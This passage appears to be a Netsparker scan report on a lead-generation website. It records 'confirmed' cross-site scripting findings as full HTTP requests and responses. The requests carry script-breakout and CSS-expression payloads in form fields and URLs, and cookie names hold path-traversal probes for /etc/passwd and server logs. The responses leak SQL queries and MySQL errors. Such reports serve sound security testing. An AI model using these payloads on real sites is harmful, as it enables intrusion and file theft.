OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bbbvqbpg7vhm99en4nklktb935; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00050F)</script>/' union select prj.catI' at line 5
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST '"--></style></script><script>alert(0x000509)</script>

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000509)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D0030714F0C8C0E9F8ADA5D143BA6D35; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="'"--></style></script><script>netsparker(0x000509)</script>"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E

/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000519)</script>

Request

GET /ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000519)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1gfjos41ig74404n9arn5e7885; path=/
Content-Length: 2883
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR 
prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000519)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST '"--></style></script><script>alert(0x00050D)</script>
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
